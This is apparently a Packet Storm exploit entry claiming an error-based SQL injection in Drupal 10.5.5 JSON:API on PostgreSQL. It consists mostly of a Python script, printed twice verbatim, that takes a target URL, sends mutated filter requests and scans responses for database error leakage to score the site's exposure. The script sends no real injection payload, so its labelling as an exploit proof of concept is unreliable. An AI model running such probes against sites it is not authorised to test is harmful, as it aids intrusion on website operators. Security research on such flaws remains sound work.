9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL...
Basic Information
ID
PACKETSTORM:223236
Published
Jun 11, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.drupal.org/project/drupal |
==================================================================================================================================
[+] Summary : This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL.
[+] POC :
#!/usr/bin/env python3
import requests
import re
import sys
from urllib.parse import urlencode
class DrupalJSONAPIAuditor:
SQL_ERROR_PATTERNS = [
r"postgresql",
r"syntax error",
r"sqlstate",
r"invalid input syntax",
r"query failed",
r"database error",
r"exception",
r"stack trace",
r"uncaught",
r"warning:",
r"fatal error",
r"pdoexception",
r"doctrine",
r"sql error"
]
def __init__(self, url):
self.url = url
self.headers = {
"Accept":
"application/vnd.api+json",
"Content-Type":
"application/vnd.api+json"
}
def send_request(self, params):
try:
r = requests.get(
self.url,
params=params,
headers=self.headers,
timeout=10
)
return {
"status":
r.status_code,
"length":
len(r.text),
"body":
r.text
}
except Exception as e:
return {
"error":
str(e)
}
def baseline(self):
params = {
"filter[test][condition][path]":
"title",
"filter[test][condition][operator]":
"=",
"filter[test][condition][value]":
"example"
}
return self.send_request(
params
)
def mutated_filters(self):
tests = []
candidates = [
"unexpected",
"nested",
"long_key_name_" * 5,
"special_chars",
"duplicate"
]
for name in candidates:
params = {
f"filter[{name}][condition][path]":
"title",
f"filter[{name}][condition][operator]":
"IN",
f"filter[{name}][condition][value][0]":
"example"
}
tests.append(
(
name,
self.send_request(
params
)
)
)
return tests
def detect_error_leakage(self, body):
hits = []
lower = body.lower()
for p in self.SQL_ERROR_PATTERNS:
if re.search(
p,
lower,
re.I
):
hits.append(
p
)
return hits
def compare_response(self, base, other):
return {
"status_change":
base["status"] !=
other["status"],
"size_delta":
abs(
base["length"] -
other["length"]
)
}
def confidence(self, score):
if score >= 5:
return "HIGH"
if score >= 2:
return "MEDIUM"
return "LOW"
def run(self):
print(
f"[*] Auditing: {self.url}"
)
base = self.baseline()
if "error" in base:
print(
"[!] Request failed"
)
return
score = 0
print(
f"[*] Baseline: "
f"{base['status']} "
f"({base['length']} bytes)"
)
results = self.mutated_filters()
for name, result in results:
if "error" in result:
continue
diff = self.compare_response(
base,
result
)
leaks = self.detect_error_leakage(
result["body"]
)
print(
f"\n[{name}]"
)
print(
f"status change: "
f"{diff['status_change']}"
)
print(
f"size delta: "
f"{diff['size_delta']}"
)
if leaks:
print(
"error indicators:"
)
for l in leaks:
print(
f" -> {l}"
)
score += len(leaks)
if diff["status_change"]:
score += 1
if diff["size_delta"] > 100:
score += 1
print("\n==== SUMMARY ====")
print(
f"Exposure Score: {score}"
)
print(
f"Confidence: "
f"{self.confidence(score)}"
)
if __name__ == "__main__":
if len(sys.argv) != 2:
print(
f"usage:\n"
f"{sys.argv[0]} "
f"http://host/jsonapi/node/article"
)
sys.exit(1)
auditor = DrupalJSONAPIAuditor(
sys.argv[1]
)
auditor.run()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : Drupal core 10.5.5 JSON:API PostgreSQL Error-Based SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.drupal.org/project/drupal |
==================================================================================================================================
[+] Summary : This code demonstrates a research-oriented implementation targeting a reported SQL injection condition in Drupal JSON:API endpoints backed by PostgreSQL.
[+] POC :
#!/usr/bin/env python3
import requests
import re
import sys
from urllib.parse import urlencode
class DrupalJSONAPIAuditor:
SQL_ERROR_PATTERNS = [
r"postgresql",
r"syntax error",
r"sqlstate",
r"invalid input syntax",
r"query failed",
r"database error",
r"exception",
r"stack trace",
r"uncaught",
r"warning:",
r"fatal error",
r"pdoexception",
r"doctrine",
r"sql error"
]
def __init__(self, url):
self.url = url
self.headers = {
"Accept":
"application/vnd.api+json",
"Content-Type":
"application/vnd.api+json"
}
def send_request(self, params):
try:
r = requests.get(
self.url,
params=params,
headers=self.headers,
timeout=10
)
return {
"status":
r.status_code,
"length":
len(r.text),
"body":
r.text
}
except Exception as e:
return {
"error":
str(e)
}
def baseline(self):
params = {
"filter[test][condition][path]":
"title",
"filter[test][condition][operator]":
"=",
"filter[test][condition][value]":
"example"
}
return self.send_request(
params
)
def mutated_filters(self):
tests = []
candidates = [
"unexpected",
"nested",
"long_key_name_" * 5,
"special_chars",
"duplicate"
]
for name in candidates:
params = {
f"filter[{name}][condition][path]":
"title",
f"filter[{name}][condition][operator]":
"IN",
f"filter[{name}][condition][value][0]":
"example"
}
tests.append(
(
name,
self.send_request(
params
)
)
)
return tests
def detect_error_leakage(self, body):
hits = []
lower = body.lower()
for p in self.SQL_ERROR_PATTERNS:
if re.search(
p,
lower,
re.I
):
hits.append(
p
)
return hits
def compare_response(self, base, other):
return {
"status_change":
base["status"] !=
other["status"],
"size_delta":
abs(
base["length"] -
other["length"]
)
}
def confidence(self, score):
if score >= 5:
return "HIGH"
if score >= 2:
return "MEDIUM"
return "LOW"
def run(self):
print(
f"[*] Auditing: {self.url}"
)
base = self.baseline()
if "error" in base:
print(
"[!] Request failed"
)
return
score = 0
print(
f"[*] Baseline: "
f"{base['status']} "
f"({base['length']} bytes)"
)
results = self.mutated_filters()
for name, result in results:
if "error" in result:
continue
diff = self.compare_response(
base,
result
)
leaks = self.detect_error_leakage(
result["body"]
)
print(
f"\n[{name}]"
)
print(
f"status change: "
f"{diff['status_change']}"
)
print(
f"size delta: "
f"{diff['size_delta']}"
)
if leaks:
print(
"error indicators:"
)
for l in leaks:
print(
f" -> {l}"
)
score += len(leaks)
if diff["status_change"]:
score += 1
if diff["size_delta"] > 100:
score += 1
print("\n==== SUMMARY ====")
print(
f"Exposure Score: {score}"
)
print(
f"Confidence: "
f"{self.confidence(score)}"
)
if __name__ == "__main__":
if len(sys.argv) != 2:
print(
f"usage:\n"
f"{sys.argv[0]} "
f"http://host/jsonapi/node/article"
)
sys.exit(1)
auditor = DrupalJSONAPIAuditor(
sys.argv[1]
)
auditor.run()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================